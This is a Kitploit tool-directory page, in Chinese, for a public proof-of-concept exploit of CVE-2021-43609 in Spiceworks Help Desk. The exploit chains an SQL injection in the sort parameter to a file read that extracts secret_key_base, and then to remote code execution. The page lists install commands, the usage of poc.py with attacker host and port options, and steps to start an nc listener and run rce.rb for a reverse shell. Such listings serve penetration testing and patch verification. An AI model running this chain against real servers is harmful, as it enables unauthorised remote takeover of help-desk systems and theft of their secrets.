Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-43609-POC — 针对 CVE-2021-43609 的概念验证漏洞利用,演示针对 Spiceworks 帮助台软件的 SQL 注入到文件读取再到远程代码执行的攻击链。 | Kitploit
工具/GitHubGitHub/d5sec/cve-2021-43609-poc
漏洞分析代码分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubd5sec/cve-2021-43609-poc

CVE-2021-43609-POC

针对 CVE-2021-43609 的概念验证漏洞利用,演示针对 Spiceworks 帮助台软件的 SQL 注入到文件读取再到远程代码执行的攻击链。

查看仓库
5122年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Spiceworks Sort SQLi

Spiceworks 的 sort 参数中存在一处 SQLi。完整利用链为 SQLi -> 文件读取 -> RCE。

演示

asciicast

先决条件

root@kitploit:~
apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install

阶段 1

使用 poc.py 利用 SQLi -> 文件读取并提取 secret_key_base 环境变量。随后它会根据 poc.py 获取到的值生成一个用于获取反向 shell 的 PoC Ruby 脚本。

用法

root@kitploit:~
usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]

There's a SQLi in a `sort` parameter of Spiceworks. The exploit chain is SQLi -> file read -> RCE.

optional arguments:
  -h, --help            show this help message and exit
  --rhost RHOST         https://example.com
  --lhost LHOST         10.10.10.10
  --lport LPORT         9001
  -u USER, --user USER  [email protected]
  -p PASSWORD, --password PASSWORD
                        P@$$w0rd!
  -e ENV_PATH, --env_path ENV_PATH
                        Path to environment variables

阶段 2

使用 rce.rb。在阶段 1 中提供的 IP 和端口上启动一个 nc 监听器,然后只需:

root@kitploit:~
cd rce && ruby rce.rb

瞧!

致谢

  • @aidanstansfield
下载工具